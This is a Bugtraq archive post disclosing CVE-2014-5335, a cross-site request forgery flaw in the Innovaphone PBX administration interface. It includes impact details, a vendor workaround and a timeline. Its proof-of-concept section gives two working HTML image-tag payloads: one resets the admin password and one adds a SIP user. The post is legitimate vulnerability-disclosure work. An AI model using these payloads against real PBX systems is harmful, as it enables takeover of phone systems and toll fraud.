Home page logo
/

bugtraq logo Bugtraq mailing list archives

[CVE-2014-5335] CSRF in Innovaphone PBX
From: rg () nsideattacklogic de
Date: Thu, 21 Aug 2014 14:47:59 GMT

Title: Innovaphone PBX Admin-GUI CSRF
Impact: High
CVSS2 Score: 7.8 (AV:N/AC:M/Au:S/C:P/I:C/A:C/E:F/RL:U/RC:C)
Announced: August 21, 2014
Reporter: Rainer Giedat (NSIDE ATTACK LOGIC GmbH, www.nsideattacklogic.de)
Products: Innovaphone PBX Administration GUI
Affected Versions: all known versions (tested 10.00 sr11)
CVE-id: CVE-2014-5335

Summary
=======

The innovaphone PBX is a powerful and sophisticated VoIP telephone system for use in professional business 
environments. In addition to a wide range of IP telephony functionalities, the innovaphone PBX is also equipped with a 
perfectly integrated Unified Communications solution that can be enabled as needed at any time and at any workspace.

The innovaphone PBX uses a web-based user interface. This UI is vulnerable to cross-site request forgery attacks (CSRF).

Description
===========

The UI does not check if a request was sent originating from a page it delivered before or from an untrusted and 
potentially malicious source. With a CSRF attack a malicious third party is able to change any configurable items from 
remote if an administrator is logged in to the user interface and visits a malicious website or clicks a manipulated 
link under the control of the attacker.

The lack of a logout mechanism and the use of the digest authentication scheme increases the probability of successful 
exploitation, because the user session will never expire automatically.

Impact
======

The attacker has full control over the innovaphone PBX and is able to manipulate every configuration item and user 
account data, as well as passwords. This can lead to the redirection of phone calls, denial of service and toll fraud 
by adding new SIP endpoints.

Proof on Concept
================

Visiting a web page including the following HTML image tag will change the administrator’s password of the 
innovaphone PBX to 'hacked':

<img 
src="http://<<PBX>>/CMD0/mod_cmd.xml?cmd=form&redirect=mod_cmd.xml%3Fxsl%3Dcommand.xsl&name=&user=admin&password=hacked&password2=hacked&help=&add.user=&add.pwd=&add.pwd2=&add.level=0&add.end=&kdc.realm=&kdc.address1=&kdc.port1=&kdc.adminport1=&kdc.address2=&kdc.port2=&kdc.adminport2=&kdc.end=&op=OK"></img>

Visiting a web page including the following image will add a new SIP user:

<img 
src="http://<<PBX>>/PBX0/ADMIN/mod_cmd_login.xml?cmd=submit-object&xsl=pbx_edit_user.xsl&tab-active=&guid=&repsrc=&search-grp=&text=&cn=Hans+Dampf&dn=Hans+Dampf&h323=Hans+Dampf&e164=666&email=&pwd=hans&pwd1=hans&node=root&loc=Opfer&fake=&obj-url=&gi=&config=&no-devs=update&dev1.hw=&dev1.text=&dev1.admin=on&dev1.no-filter=on&dev1.reg=on&filter=&cd-filter=&cfnr=&busy-out=&uc=&gw.name=&gw.ipei=&gw.dsp=&gw.ac=&gw.subs=&gw.fc=&gw.cki=&gw.ciph=&gw.end=.&save=Apply"></img>


Solution
========

Innovaphone recommends to use a dedicated browser only for administration tasks regarding the PBX and close all browser 
instances when administration is done.
More information can be found on the closed support wiki of innovaphone: 
http://wiki.innovaphone.com/index.php?title=Support:Protection_against_%22Cross-Site-Request-Forgery%22

This workaround makes sucessful exploitation harder, but an attacker may still be able to use special protocol-handlers 
to open URLs in different browsers.

No fix will be provided, since the vendor considers this to be a browser problem.


Timeline
========

2014-22-07      Bug found
2014-28-07      Vendor contact
2014-29-07      Vendor reply
2014-29-07      Technical details provided
2014-13-08      Vendor does not plan to patch for now, but provided a workaround
2014-21-08      Public release


  By Date           By Thread  

Current thread:
  • [CVE-2014-5335] CSRF in Innovaphone PBX rg (Aug 22)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]